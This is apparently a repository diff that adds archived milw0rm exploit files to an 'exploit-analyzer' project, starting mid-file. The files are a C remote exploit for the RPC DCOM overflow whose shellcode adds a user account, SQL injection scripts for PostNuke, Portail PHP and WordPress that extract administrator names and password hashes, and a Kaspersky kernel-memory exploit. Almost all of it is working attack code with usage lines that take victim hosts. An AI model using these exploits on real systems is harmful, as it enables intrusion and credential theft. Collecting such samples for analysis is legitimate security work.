+0x2B,0x10,0x48,0x60,0x02,0x00,0x00,0x00};
+unsigned char request1[]={
+0x05,0x00,0x00,0x03,0x10,0x00,0x00,0x00,0xE8,0x03
+,0x00,0x00,0xE5,0x00,0x00,0x00,0xD0,0x03,0x00,0x00,0x01,0x00,0x04,0x00,0x05,0x00
+,0x06,0x00,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x32,0x24,0x58,0xFD,0xCC,0x45
+,0x64,0x49,0xB0,0x70,0xDD,0xAE,0x74,0x2C,0x96,0xD2,0x60,0x5E,0x0D,0x00,0x01,0x00
+,0x00,0x00,0x00,0x00,0x00,0x00,0x70,0x5E,0x0D,0x00,0x02,0x00,0x00,0x00,0x7C,0x5E
+,0x0D,0x00,0x00,0x00,0x00,0x00,0x10,0x00,0x00,0x00,0x80,0x96,0xF1,0xF1,0x2A,0x4D
+,0xCE,0x11,0xA6,0x6A,0x00,0x20,0xAF,0x6E,0x72,0xF4,0x0C,0x00,0x00,0x00,0x4D,0x41
+,0x52,0x42,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x0D,0xF0,0xAD,0xBA,0x00,0x00
+,0x00,0x00,0xA8,0xF4,0x0B,0x00,0x60,0x03,0x00,0x00,0x60,0x03,0x00,0x00,0x4D,0x45
+,0x4F,0x57,0x04,0x00,0x00,0x00,0xA2,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00
+,0x00,0x00,0x00,0x00,0x00,0x46,0x38,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00
+,0x00,0x00,0x00,0x00,0x00,0x46,0x00,0x00,0x00,0x00,0x30,0x03,0x00,0x00,0x28,0x03
+,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0xC8,0x00
+,0x00,0x00,0x4D,0x45,0x4F,0x57,0x28,0x03,0x00,0x00,0xD8,0x00,0x00,0x00,0x00,0x00
+,0x00,0x00,0x02,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
+,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xC4,0x28,0xCD,0x00,0x64,0x29
+,0xCD,0x00,0x00,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0xB9,0x01,0x00,0x00,0x00,0x00
+,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xAB,0x01,0x00,0x00,0x00,0x00
+,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xA5,0x01,0x00,0x00,0x00,0x00
+,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xA6,0x01,0x00,0x00,0x00,0x00
+,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xA4,0x01,0x00,0x00,0x00,0x00
+,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xAD,0x01,0x00,0x00,0x00,0x00
+,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xAA,0x01,0x00,0x00,0x00,0x00
+,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x07,0x00,0x00,0x00,0x60,0x00
+,0x00,0x00,0x58,0x00,0x00,0x00,0x90,0x00,0x00,0x00,0x40,0x00,0x00,0x00,0x20,0x00
+,0x00,0x00,0x78,0x00,0x00,0x00,0x30,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x10
+,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x50,0x00,0x00,0x00,0x4F,0xB6,0x88,0x20,0xFF,0xFF
+,0xFF,0xFF,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
+,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
+,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
+,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
+,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x10
+,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x48,0x00,0x00,0x00,0x07,0x00,0x66,0x00,0x06,0x09
+,0x02,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x10,0x00
+,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x00,0x00
+,0x00,0x00,0x78,0x19,0x0C,0x00,0x58,0x00,0x00,0x00,0x05,0x00,0x06,0x00,0x01,0x00
+,0x00,0x00,0x70,0xD8,0x98,0x93,0x98,0x4F,0xD2,0x11,0xA9,0x3D,0xBE,0x57,0xB2,0x00
+,0x00,0x00,0x32,0x00,0x31,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x80,0x00
+,0x00,0x00,0x0D,0xF0,0xAD,0xBA,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
+,0x00,0x00,0x00,0x00,0x00,0x00,0x18,0x43,0x14,0x00,0x00,0x00,0x00,0x00,0x60,0x00
+,0x00,0x00,0x60,0x00,0x00,0x00,0x4D,0x45,0x4F,0x57,0x04,0x00,0x00,0x00,0xC0,0x01
+,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x3B,0x03
+,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x00,0x00
+,0x00,0x00,0x30,0x00,0x00,0x00,0x01,0x00,0x01,0x00,0x81,0xC5,0x17,0x03,0x80,0x0E
+,0xE9,0x4A,0x99,0x99,0xF1,0x8A,0x50,0x6F,0x7A,0x85,0x02,0x00,0x00,0x00,0x00,0x00
+,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
+,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x30,0x00
+,0x00,0x00,0x78,0x00,0x6E,0x00,0x00,0x00,0x00,0x00,0xD8,0xDA,0x0D,0x00,0x00,0x00
+,0x00,0x00,0x00,0x00,0x00,0x00,0x20,0x2F,0x0C,0x00,0x00,0x00,0x00,0x00,0x00,0x00
+,0x00,0x00,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x03,0x00,0x00,0x00,0x46,0x00
+,0x58,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x10,0x00
+,0x00,0x00,0x30,0x00,0x2E,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
+,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x68,0x00
+,0x00,0x00,0x0E,0x00,0xFF,0xFF,0x68,0x8B,0x0B,0x00,0x02,0x00,0x00,0x00,0x00,0x00
+,0x00,0x00,0x00,0x00,0x00,0x00};
+unsigned char request2[]={
+0x20,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x20,0x00
+,0x00,0x00,0x5C,0x00,0x5C,0x00};
+unsigned char request3[]={
+0x46,0x00,0x43,0x00,0x24,0x00,0x46,0x00,
+0x31,0x00,0x32,0x00,0x33,0x00,0x34,0x00,0x35,0x00
+,0x36,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00
+,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00
+,0x2E,0x00,0x64,0x00,0x6F,0x00,0x63,0x00,0x00,0x00};
+unsigned char sccnsp3sp4[]=
+    "\x6C\x00\x6F\x00\x63\x00\x61\x00\x6C\x00\x68\x00"
+    "\x6F\x00\x73\x00\x74\x00\x5C\x00\x43\x00\x24\x00\x5C\x00"
+    "\x58\x00\xeb\x3c\x46\x00\x46\x00\xeb\x7c\x46\x00\x46\x00\x38\x6e"
+    "\xeb\x02\xeb\x05\xe8\xf9\xff\xff\xff\x58\x83\xc0\x1b\x8d\xa0\x01"
+    "\xeb\x1e\xff\x83\xe4\xfc\x8b\xec\x33\xc9\x66\xb9\x99\x01\x80\x30"
+    "\xf6\xe0\xe0\x93\xdf\xfc\xf2\xf7\xeb\x06\xf1\xe1\xf2\xe1\xea\xd2"
+//SHELLCODE From  SAM ,THANKs !
+//Add user SST,password is 557,
+"\xEB\x10\x5A\x4A\x33\xC9\x66\xB9\x4D\x01\x80\x34\x0A\x99\xE2\xFA"
+"\xEB\x05\xE8\xEB\xFF\xFF\xFF"
+"\x70\xDA\x98\x99\x99\xCC\x12\x75\x18\x75\x19\x99\x99\x99\x12\x6D"
+"\x71\x92\x98\x99\x99\x10\x9F\x66\xAF\xF1\x01\x67\x13\x97\x71\x3C"
+"\x99\x99\x99\x10\xDF\x95\x66\xAF\xF1\xE7\x41\x7B\xEA\x71\x0F\x99"
+"\x99\x99\x10\xDF\x89\xFD\x38\x81\x99\x99\x99\x12\xD9\xA9\x14\xD9"
+"\x81\x22\x99\x99\x8E\x99\x10\x81\xAA\x59\xC9\xF3\xFD\xF1\xB9\xB6"
+"\xF8\xFD\xF1\xB9\xEA\xEA\xED\xF1\xEC\xEA\xFC\xEB\xF1\xF7\xFC\xED"
+"\xB9\x12\x55\xC9\xC8\x66\xCF\x95\xAA\x59\xC9\xF1\xB9\xAC\xAC\xAE"
+"\xF1\xB9\xEA\xEA\xED\xF1\xEC\xEA\xFC\xEB\xF1\xF7\xFC\xED\xB9\x12"
+"\x55\xC9\xC8\x66\xCF\x95\xAA\x59\xC9\xF1\xFD\xFD\x99\x99\xF1\xED"
+"\xB9\xB6\xF8\xF1\xEA\xB9\xEA\xEA\xF1\xF8\xED\xF6\xEB\xF1\xF0\xEA"
+"\xED\xEB\xF1\xFD\xF4\xF0\xF7\xF1\xEC\xE9\xB9\xF8\xF1\xF5\xFE\xEB"
+"\xF6\xF1\xF5\xF6\xFA\xF8\xF1\xF7\xFC\xED\xB9\x12\x55\xC9\xC8\x66"
+"\xCF\x95\xAA\x59\xC9\x66\xCF\x89\xCA\xCC\xCF\xCE\x12\xF5\xBD\x81"
+"\x12\xDC\xA5\x12\xCD\x9C\xE1\x9A\x4C\x12\xD3\x81\x12\xC3\xB9\x9A"
+"\x44\x7A\xAB\xD0\x12\xAD\x12\x9A\x6C\xAA\x66\x65\xAA\x59\x35\xA3"
+"\x5D\xED\x9E\x58\x56\x94\x9A\x61\x72\x6B\xA2\xE5\xBD\x8D\xEC\x78"
+"\x12\xC3\xBD\x9A\x44\xFF\x12\x95\xD2\x12\xC3\x85\x9A\x44\x12\x9D"
+"\x12\x9A\x5C\x72\x9B\xAA\x59\x12\x4C\xC6\xC7\xC4\xC2\x5B\x9D\x99"
+"\xCC\xCF\xFD\x38\xA9\x99\x99\x99\x1C\x59\xE1\x95\x12\xD9\x95\x12"
+"\xE9\x85\x34\x12\xF1\x91\x72\x90\x12\xD9\xAD\x12\x31\x21\x99\x99"
+"\x99\x12\x5C\xC7\xC4\x5B\x9D\x99\x71\x21\x67\x66\x66"
+    "\x6e\x60\x38\xcc\x54\xd6\x93\xd7\x93\x93\x93\x1a\xce\xaf\x1a\xce"
+    "\xab\x1a\xce\xd3\x54\xd6\xbf\x92\x92\x93\x93\x1e\xd6\xd7\xc3\xc6"
+    "\xc2\xc2\xc2\xd2\xc2\xda\xc2\xc2\xc5\xc2\x6c\xc4\x77\x6c\xe6\xd7"
+    "\x6c\xc4\x7b\x6c\xe6\xdb\x6c\xc4\x7b\xc0\x6c\xc4\x6b\xc3\x6c\xc4"
+    "\x7f\x19\x95\xd5\x17\x53\xe6\x6a"
+    "\xc2\xc1\xc5\xc0\x6c\x41\xc9\xca"
+    "\x1a\x94\xd4\xd4\xd4\xd4\x71\x7a\x50\x90\x90\x90"     //
+    "\x90\x90\x90\x90\x90\x90\x90\x90"
+    "\x77\xe0\x43\x00\x00\x10\x5c\x00"
+    "\xeb\x1e\x01\x00"//     FOR CN SP3/SP4+-MS03-26
+    "\x4C\x14\xec\x77"//    TOP SEH FOR cn w2k+SP4,must modify to SEH of your target's os
+//FILL BYTE,so sizeof(UNC)>0X400(0X80*8),why? You can read more form  my artic
+//"Utilization of released heap structure and exploit of universal Heap overflow in windows ".
+"\xEB\x10\x5A\x4A\x33\xC9\x66\xB9\x90\x02\x80\x34\x0A\x99\xE2\xFA"
+"\xEB\x05\xE8\xEB\xFF\xFF\xFF"
+"\xC7\x5F\x9D\xBD\xDD\x14\xDD\xBD\xDD\xC9\x14\xDD\xBD\x9D\xC9\x14"
+"\x1D\xBD\x1D\x99\x99\x99\xC9\x14\x1D\xBD\x0D\x99\x99\x99\xC9\xAA"
+"\x59\xC9\xC9\xC9\xC9\xCA\x14\x1D\xBD\x2D\x99\x99\x99\xC9\x66\xCF"
+"\x95\x14\xD5\xBD\xDD\x14\x8D\xBD\xAA\x59\xC9\xF1\xAC\x99\xAE\x99"
+"\xF1\xB9\x99\xAC\x99\xF1\xEA\x99\xED\x99\xF1\xB9\x99\xEA\x99\xF1"
+"\xFC\x99\xEB\x99\xF1\xEC\x99\xEA\x99\xF1\xED\x99\xB9\x99\xF1\xF7"
+"\x99\xFC\x99\x12\x45\xC8\xCB\xC8\xCB\x14\x1D\xBD\x29\x99\x99\x99"
+"\xC9\x14\x1D\xBD\x59\x99\x99\x99\xC9\xAA\x59\xC9\xC9\xC9\xC9\xCA"
+"\x14\x1D\xBD\x79\x99\x99\x99\xC9\x66\xCF\x95\xC3\xC0\xAA\x59\xC9"
+"\xF1\xFD\x99\xFD\x99\xF1\xB6\x99\xF8\x99\xF1\xED\x99\xB9\x99\xF1"
+"\xEA\x99\xEA\x99\xF1\xEA\x99\xB9\x99\xF1\xF6\x99\xEB\x99\xF1\xF8"
+"\x99\xED\x99\xF1\xED\x99\xEB\x99\xF1\xF0\x99\xEA\x99\xF1\xF0\x99"
+"\xF7\x99\xF1\xFD\x99\xF4\x99\xF1\xB9\x99\xF8\x99\xF1\xEC\x99\xE9"
+"\x99\xF1\xEB\x99\xF6\x99\xF1\xF5\x99\xFE\x99\xF1\xFA\x99\xF8\x99"
+"\xF1\xF5\x99\xF6\x99\xF1\xED\x99\xB9\x99\xF1\xF7\x99\xFC\x99\x12"
+"\x45\xC8\xCB\x14\x1D\xBD\x61\x99\x99\x99\xC9\x14\x1D\xBD\x91\x98"
+"\x99\x99\xC9\xAA\x59\xC9\xC9\xC9\xC9\xCA\x14\x1D\xBD\xB1\x98\x99"
+"\x99\xC9\x66\xCF\x95\xAA\x59\xC9\x66\xCF\x89\xCA\xCC\xCF\xCE\x12"
+"\xF5\xBD\x81\x12\xDC\xA5\x12\xCD\x9C\xE1\x9A\x4C\x12\xD3\x81\x12"
+"\xC3\xB9\x9A\x44\x7A\xAB\xD0\x12\xAD\x12\x9A\x6C\xAA\x66\x65\xAA"
+"\x59\x35\xA3\x5D\xED\x9E\x58\x56\x94\x9A\x61\x72\x6B\xA2\xE5\xBD"
+"\x8D\xEC\x78\x12\xC3\xBD\x9A\x44\xFF\x12\x95\xD2\x12\xC3\x85\x9A"
+"\x44\x12\x9D\x12\x9A\x5C\x72\x9B\xAA\x59\x12\x4C\xC6\xC7\xC4\xC2"
+"\x5B\x9D\x99\xCC\xCF\xFD\x38\xA9\x99\x99\x99\x1C\x59\xE1\x95\x12"
+"\xD9\x95\x12\xE9\x85\x34\x12\xF1\x91\x72\x90\x12\xD9\xAD\x12\x31"
+"\x21\x99\x99\x99\x12\x5C\xC7\xC4\x5B\x9D\x99\x71\xEC\x64\x66\x66"
+"\x04\x04\x00\x70\x00\x04\x40"
+"\x00\x10\x5c\x00\x78\x01\x07\x00\x78\x01\x07\x00\xa0\x04\x00"
+"\x21\x99\x99\x99\x12\x5C\xC7\xC4\x5B\x9D\x99\x71";
+unsigned char request4[]={
+0x01,0x10
+,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x20,0x00,0x00,0x00,0x30,0x00,0x2D,0x00,0x00,0x00
+,0x00,0x00,0x88,0x2A,0x0C,0x00,0x02,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x28,0x8C
+,0x0C,0x00,0x01,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0x00,0x00,0x00,0x00
+};
+void main(int argc,char ** argv)
+{
+    WSADATA WSAData;
+    SOCKET sock;
+    int len,len1;
+    SOCKADDR_IN addr_in;
+    short port=135;
+    unsigned char buf1[0x1000];
+    unsigned char buf2[0x1000];
+    printf("RPC DCOM overflow Vulnerability discoveried by NSFOCUS\n");
+    printf("Code by FlashSky,Flashsky xfocus org\n");
+    printf("Welcome to our Site: http://www.xfocus.org\n");
+    printf("Welcome to our Site: http://www.venustech.com.cn\n");
+    if(argc!=2)
+    {
+        printf("%s targetIP \n",argv[0]);
+        printf("for cn w2k server sp3/sp4+ms03-26\n");
+    }
+    if (WSAStartup(MAKEWORD(2,0),&WSAData)!=0)
+    {
+        printf("WSAStartup error.Error:%d\n",WSAGetLastError());
+        return;
+    }
+    addr_in.sin_family=AF_INET;
+    addr_in.sin_port=htons(port);
+    addr_in.sin_addr.S_un.S_addr=inet_addr(argv[1]);
+    if ((sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))==INVALID_SOCKET)
+    {
+        printf("Socket failed.Error:%d\n",WSAGetLastError());
+        return;
+    }
+    len1=sizeof(request1);
+    len=sizeof(sccnsp3sp4);
+    if(WSAConnect(sock,(struct sockaddr *)&addr_in,sizeof(addr_in),NULL,NULL,NULL,NULL)==SOCKET_ERROR)
+    {
+        printf("Connect failed.Error:%d",WSAGetLastError());
+        return;
+    }
+    memcpy(buf2,request1,sizeof(request1));
+    *(DWORD *)(request2)=*(DWORD *)(request2)+sizeof(sccnsp3sp4)/2;
+    *(DWORD *)(request2+8)=*(DWORD *)(request2+8)+sizeof(sccnsp3sp4)/2;
+    memcpy(buf2+len1,request2,sizeof(request2));
+    len1=len1+sizeof(request2);
+    memcpy(buf2+len1,sccnsp3sp4,sizeof(sccnsp3sp4));
+    len1=len1+sizeof(sccnsp3sp4);
+    memcpy(buf2+len1,request3,sizeof(request3));
+    len1=len1+sizeof(request3);
+    memcpy(buf2+len1,request4,sizeof(request4));
+    len1=len1+sizeof(request4);
+    *(DWORD *)(buf2+8)=*(DWORD *)(buf2+8)+len-0xc;
+    *(DWORD *)(buf2+0x10)=*(DWORD *)(buf2+0x10)+len-0xc;
+    *(DWORD *)(buf2+0x80)=*(DWORD *)(buf2+0x80)+len-0xc;
+    *(DWORD *)(buf2+0x84)=*(DWORD *)(buf2+0x84)+len-0xc;
+    *(DWORD *)(buf2+0xb4)=*(DWORD *)(buf2+0xb4)+len-0xc;
+    *(DWORD *)(buf2+0xb8)=*(DWORD *)(buf2+0xb8)+len-0xc;
+    *(DWORD *)(buf2+0xd0)=*(DWORD *)(buf2+0xd0)+len-0xc;
+    *(DWORD *)(buf2+0x18c)=*(DWORD *)(buf2+0x18c)+len-0xc;
+    if (send(sock,bindstr,sizeof(bindstr),0)==SOCKET_ERROR)
+    {
+            printf("Send failed.Error:%d\n",WSAGetLastError());
+            return;
+    }
+    len=recv(sock,buf1,1000,NULL);
+    if (send(sock,buf2,len1,0)==SOCKET_ERROR)
+    {
+            printf("Send failed.Error:%d\n",WSAGetLastError());
+            return;
+    }
+//    len=recv(sock,buf1,1024,NULL);
+}
+/*
+*/
+// milw0rm.com [2003-09-20]

exploit-analyzer/exploits/exploit_1030.txt ADDED Viewed

	@@ -0,0 +1,62 @@

+#!/usr/bin/perl
+# This tools is only for educational purpose
+#
+# K-C0d3r a x0n3-h4ck friend !!!
+#
+# This exploit should give admin nick and md5 password
+#
+#-=[ PostNuke SQL Injection                     version : x=> 0.750]=-
+#-=[                                                               ]=-
+#-=[ Discovered by sp3x                                            ]=-
+#-=[ Coded by K-C0d3r                                              ]=-
+#-=[ irc.xoned.net #x0n3-h4ck to find me   K-c0d3r[at]x0n3-h4ck.org]=-
+#
+# Greetz to mZ, 2b TUBE, off, rikky, milw0rm, str0ke
+#
+# !!! NOW IS PUBLIC (6-6-2005) !!!
+use IO::Socket;
+sub Usage {
+print STDERR "Usage: KCpnuke-xpl.pl <www.victim.com> </path/to/modules.php>\n";
+exit;
+}
+if (@ARGV < 2)
+{
+ Usage();
+}
+if (@ARGV > 2)
+{
+ Usage();
+}
+if (@ARGV == 2)
+{
+$host = @ARGV[0];
+$path = @ARGV[1];
+print "[K-C0d3r] PostNuke SQL Injection [x0n3-h4ck]\n";
+print "[+] Connecting to $host\n";
+$injection = "$host\/$path?";
+$injection .= "op=modload&name=Messages&file=readpmsg&start=0";
+$injection .= "%20UNION%20SELECT%20pn_uname,null,pn_uname,pn_pass,pn_pass,null,pn_pass,null";
+$injection .= "%20FROM%20pn_users%20WHERE%20pn_uid=2\/*&total_messages=1";
+$socket = new IO::Socket::INET (PeerAddr => "$host",
+                                PeerPort => 80,
+                                Proto => 'tcp');
+                                die unless $socket;
+print "[+] Injecting command ...\n";
+print $socket "GET http://$injection HTTP/1.1\nHost: $host\n\n";
+while (<$socket>)
+{
+ print $_;
+ exit;
+}
+}
+# milw0rm.com [2005-06-05]

exploit-analyzer/exploits/exploit_1031.txt ADDED Viewed

	@@ -0,0 +1,29 @@

+#!/usr/bin/perl -w
+#
+# SQL Injection Exploit for Portail PHP < 1.3
+# This exploit show the username of the administrator of the portal and his password crypted in MD5
+# Related advisory: http://www.securityfocus.com/archive/1/398728/2005-05-21/2005-05-27/0
+# Coded by Alberto Trivero
+use LWP::Simple;
+print "\n\t=================================\n";
+print "\t= Exploit for Portail PHP < 1.3 =\n";
+print "\t= Alberto Trivero - codebug.org =\n";
+print "\t=================================\n\n";
+if(!$ARGV[0] or !($ARGV[0]=~m/http/)) {
+   print "Usage:\nperl $0 [full_target_path]\n\n";
+   print "Examples:\nperl $0 http://www.example.com/portailphp/\n";
+   exit(0);
+}
+$url=q[index.php?affiche=Liens&id=1%20UNION%20SELECT%20null,null,null,null,null,null,US_pwd,US_nom,null%20FROM%20pphp_user/*];
+$page=get($ARGV[0].$url) || die "[-] Unable to retrieve: $!";
+print "[+] Connected to: $ARGV[0]\n";
+$page=~m/0000-00-00, 0  \)<\/i>     <br><br><br><br><\/td>   <\/tr>   <tr>     <td width='100%'>(.*?)<\/td>   <\/tr>/ && print "[+] Username of administrator is: $1\n";
+print "[-] Unable to retrieve username\n" if(!$1);
+$page=~m/<img border='0' src='\.\/images\/ico_liens\.gif' >&nbsp;<b> <\/b>: (.*?)<\/td>/ && print "[+] MD5 hash of password is: $1\n";
+print "[-] Unable to retrieve hash of password\n" if(!$1);
+# milw0rm.com [2005-06-06]

exploit-analyzer/exploits/exploit_1032.txt ADDED Viewed

	@@ -0,0 +1,153 @@

+/* Added NO_STRICT to 1 on line 2 /str0ke ! milw0rm.com */
+#define NO_STRICT 1
+#include <windows.h>
+#undef STRICT
+PUCHAR pCodeBase=(PUCHAR)0xBE9372C0;
+PDWORD pJmpAddress=(PDWORD)0xBE9372B0;
+PUCHAR pKAVRets[]={(PUCHAR)0xBE935087,(PUCHAR)0xBE935046};
+PUCHAR pKAVRet;
+unsigned char code[]={0x68,0x00,0x02,0x00,0x00,	//push 0x200
+					0x68,0x00,0x80,0x93,0xBE,	//push <buffer address> - 0xBE938000
+					0x6A,0x00,					//push 0
+					0xB8,0x00,0x00,0x00,0x00,	//mov eax,<GetModuleFileNameA> -> +13
+					0xFF,0xD0,					//call eax
+					0x68,0x00,0x80,0x93,0xBE,	//push <buffer address>
+					0x68,0x00,0x82,0x93,0xBE,	//push <address of the notepad path>- 0xBE938200
+					0xB8,0x00,0x00,0x00,0x00,	//mov eax,<lstrcmpiA> -> +30
+					0xFF,0xD0,					//call eax
+					0x85,0xC0,					//test eax,eax
+					0x74,0x03,					//je +03
+					0xC2,0x04,0x00,				//retn 4
+					0x6A,0x00,					//push 0
+					0x68,0x00,0x84,0x93,0xBE,	//push <address of the message string>- 0xBE938400
+					0x68,0x00,0x84,0x93,0xBE,	//push <address of the message string>- 0xBE938400
+					0x6A,0x00,					//push 0
+					0xB8,0x00,0x00,0x00,0x00,	//mov eax,<MessageBoxA> -> +58
+					0xFF,0xD0,					//call eax
+					0xC2,0x04,0x00				//retn 4
+					};
+unsigned char jmp_code[]={0xFF,0x25,0xB0,0x72,0x93,0xBE}; //jmp dword prt [0xBE9372B0]
+//////////////////////////////////////////////////////////////
+BOOLEAN LoadExploitIntoKernelMemory(void){
+//Get function's addresses
+	HANDLE hKernel=GetModuleHandle("KERNEL32.DLL");
+	HANDLE hUser=GetModuleHandle("USER32.DLL");
+	FARPROC pGetModuleFileNameA=GetProcAddress(hKernel,"GetModuleFileNameA");
+	FARPROC plstrcmpiA=GetProcAddress(hKernel,"lstrcmpiA");
+	FARPROC pMessageBoxA=GetProcAddress(hUser,"MessageBoxA");
+	*(DWORD*)(code+13)=(DWORD)pGetModuleFileNameA;
+	*(DWORD*)(code+30)=(DWORD)plstrcmpiA;
+	*(DWORD*)(code+58)=(DWORD)pMessageBoxA;
+//Prepare our data into ring0-zone.
+	PCHAR pNotepadName=(PCHAR)0xBE938200;
+	char temp_buffer[MAX_PATH];
+	char *s;
+	SearchPath(NULL,"NOTEPAD",".EXE",sizeof(temp_buffer),temp_buffer,&s);
+	lstrcpy(pNotepadName,temp_buffer);
+	PCHAR pMessage=(PCHAR)0xBE938400;
+	lstrcpy(pMessage,"Notepad is running!!! KAV is vulnerable!!!");
+	memmove(pCodeBase,code,sizeof(code));
+	*pJmpAddress=(DWORD)pCodeBase;
+	memmove(pKAVRet,jmp_code,sizeof(jmp_code));
+	return TRUE;
+}
+///////////////////////////////////////////////////////////////
+void UnloadExploitFromKernelMemory(){
+	UCHAR retn_4[]={0xC2,0x04,0x00};
+	memmove(pKAVRet,retn_4,sizeof(retn_4));
+}
+/////////////////////////////////////////////////////////////////
+PUCHAR GetKAVRetAddress(void){
+//Check the retn 4 in the KAV 0xBE9334E1 function end
+//Also, we check the KAV klif.sys existance.
+	UCHAR retn_4[]={0xC2,0x04,0x00};
+	__try{
+		for(DWORD i=0;i<sizeof(pKAVRets)/sizeof(pKAVRets[0]);i++){
+			if(memcmp(pKAVRets[i],retn_4,sizeof(retn_4))==0)
+				return pKAVRets[i];
+		}
+	}__except(EXCEPTION_EXECUTE_HANDLER){MessageBox(NULL,"KAV is not installed",NULL,0);return NULL;}
+	MessageBox(NULL,"Wrong KAV version. You need 5.0.227, 5.0.228 or 5.0.335 versions of KAV",NULL,0);
+	return NULL;
+}
+/////////////////////////////////////////////////////////////////
+void main(void){
+	pKAVRet=GetKAVRetAddress();
+	if(NULL==pKAVRet)
+		return;
+	if(!LoadExploitIntoKernelMemory())
+		return;
+	char temp_buffer[MAX_PATH];
+	char *s;
+	SearchPath(NULL,"NOTEPAD",".EXE",sizeof(temp_buffer),temp_buffer,&s);
+	PROCESS_INFORMATION pi;
+	STARTUPINFO si={0};
+	si.cb=sizeof(si);
+	CreateProcess(NULL,temp_buffer,NULL,NULL,FALSE,
+						0,NULL,NULL,&si,&pi);
+	WaitForSingleObject(pi.hProcess,INFINITE);
+	MessageBox(NULL,"Now you may start your own Notepad instance to check this exploit!","KAV_EXPLOITER",0);
+	MessageBox(NULL,"Close this window to stop exploitation","KAV_EXPLOITER",0);
+	UnloadExploitFromKernelMemory();
+}
+// milw0rm.com [2005-06-07]

exploit-analyzer/exploits/exploit_1033.txt ADDED Viewed

	@@ -0,0 +1,32 @@

+#!/usr/bin/perl -w
+#
+# SQL Injection Exploit for WordPress <= 1.5.1.1
+# This exploit shows the username of the administrator of the blog and his
+# password crypted in MD5, you must only choose the correct version of the target
+# Related advisory: http://www.gentoo.org/security/en/glsa/glsa-200506-04.xml
+# Patch: download the last version at http://wordpress.org/download/
+# Coded by Alberto Trivero
+use LWP::Simple;
+print "\n\t====================================\n";
+print "\t= Exploit for WordPress <= 1.5.1.1 =\n";
+print "\t=        by Alberto Trivero        =\n";
+print "\t====================================\n\n";
+if(!$ARGV[0] or !($ARGV[0]=~m/http/) or !($ARGV[1]==1 or $ARGV[1]==2)) {
+   print "Usage:\nperl $0 [full_target_path] [target_version: 1 OR 2]\nVersion 1: WordPress <= 1.5\nVersion 2: WordPress 1.5.1 - 1.5.1.1\n\n";
+   print "Examples:\nperl $0 http://www.example.com/wordpress/ 2\n";
+   exit(0);
+}
+$page=get($ARGV[0]."index.php?cat=%2527%20UNION%20SELECT%20CONCAT(CHAR(58),user_pass,CHAR(58),user_login,CHAR(58))%20FROM%20wp_users/*") || die "[-] Unable to retrieve: $!" if($ARGV[1]==1);
+$page=get($ARGV[0]."index.php?cat=999%20UNION%20SELECT%20null,CONCAT(CHAR(58),user_pass,CHAR(58),user_login,CHAR(58)),null,null,null%20FROM%20wp_users/*") || die "[-] Unable to retrieve: $!" if($ARGV[1]==2);
+print "[+] Connected to: $ARGV[0]\n";
+$page=~m/:([a-f0-9]{32}):(.*?):/;
+print "[+] Username of administrator is: $2\n" if($2);
+print "[+] MD5 hash of password is: $1\n" if($1);
+print "[-] Unable to retrieve username\n" if(!$2);
+print "[-] Unable to retrieve hash of password\n" if(!$1);
+# milw0rm.com [2005-06-22]
